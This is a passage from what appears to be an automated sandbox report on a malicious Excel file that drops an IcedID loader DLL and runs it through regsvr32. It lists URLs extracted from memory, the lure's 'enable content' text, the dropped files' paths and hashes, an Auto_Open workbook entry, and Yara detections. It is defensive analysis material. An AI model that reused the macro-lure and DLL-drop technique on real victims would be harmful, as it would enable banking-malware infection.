        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/?searchQuery=
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://awsmedia.s3.amazonaws.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://b0.p.awsstatic.com
        Source: regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://c0.b0.p.awsstatic.com
        Source: regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://calculator.aws
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://chtbl.com
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobile
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://d0.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic-china.com
        Source: regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://d1fgizr415o1r6.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://d1hemuljm71t2j.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://d1le29qyzha1u4.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://d1oqpvwii7b6rh.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://d1vo51ubqkiilx.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://d1yyh5dhdgifnx.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://d2908q01vomqb2.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://d2a6igt6jhaluh.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://d36cz9buwru1tt.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://d3borx6sfvnesb.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://d3ctxlq1ktw2nl.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://d3h2ozso0dirfl.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gif
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://devices.amazonaws.com?hp=tile&amp;so-exp=below
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://dftu77xade0tc.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://dgen8gghn3u86.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://dk261l6wntthl.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://download.stormacq.com/aws/podcast/
        Source: regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://dpm.demdex.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://dts.podtrac.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://f0.awsstatic.com
        Source: regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2104184000.00000000002AE000.00000004.00000020.sdmpString found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com;
        Source: regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://img.youtube.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://marketingplatform.google.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://media.amazonwebservices.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://mktg-apac.s3-ap-southeast-1.amazonaws.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://p.adsymptotic.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=fico
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllw
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&amp;sc_icampaign=
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=default
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=default
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://press.aboutamazon.com/press-releases/aws
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100828150.00000000002B4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submit
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmpString found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1CHJ6T7PJFDAQP338P4HHX-Content-Ty
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://prod.log.shortbread.aws.dev
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://prod.tools.shortbread.aws.dev
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://s3.amazonaws.com/aws-messaging-pricing-information/
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://s3.amazonaws.com/aws-quickstart/
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://s3.amazonaws.com/public-pricing-agc/
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://spot-bid-advisor.s3.amazonaws.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://ssl-static.libsyn.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://static-cdn.jtvnw.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://static.doubleclick.net
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/awscloud
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://view-stage.us-west-2.prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://website.spot.ec2.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://www.amazon.jobs/aws
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://www.buzzsprout.com;
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com;
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://www.linkedin.com
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://www.twitch.tv/aws
        Source: regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube-nocookie.com;
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://yt3.ggpht.com;
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
        Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443

        E-Banking Fraud:

        barindex
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2380, type: MEMORY

        System Summary:

        barindex
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
        Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
        Source: Document image extraction number: 0Screenshot OCR: Enable Content button from the yellow bar above
        Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
        Source: Document image extraction number: 1Screenshot OCR: Enable Content button from the yellow bar above
        Office process drops PE fileShow sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_001B1678 NtQuerySystemInformation,RtlAllocateHeap,4_2_001B1678
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_001B18104_2_001B1810
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000007FEF8FB15D04_2_000007FEF8FB15D0
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000007FEF8FB41BF4_2_000007FEF8FB41BF
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: Joe Sandbox ViewDropped File: C:\Users\user\XTOWN.dll 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/><workbookPr filterPrivacy="1" defaultThemeVersion="164011"/><bookViews><workbookView xWindow="0" yWindow="0" windowWidth="22260" windowHeight="12645"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Sheet1" sheetId="8" r:id="rId2"/><sheet name="Sheet2" sheetId="4" r:id="rId3"/><sheet name="Sheet3" sheetId="2" r:id="rId4"/><sheet name="Sheet4" sheetId="3" r:id="rId5"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet3!$CA$13</definedName></definedNames><calcPr calcId="162913"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
        Source: 4.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 4.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
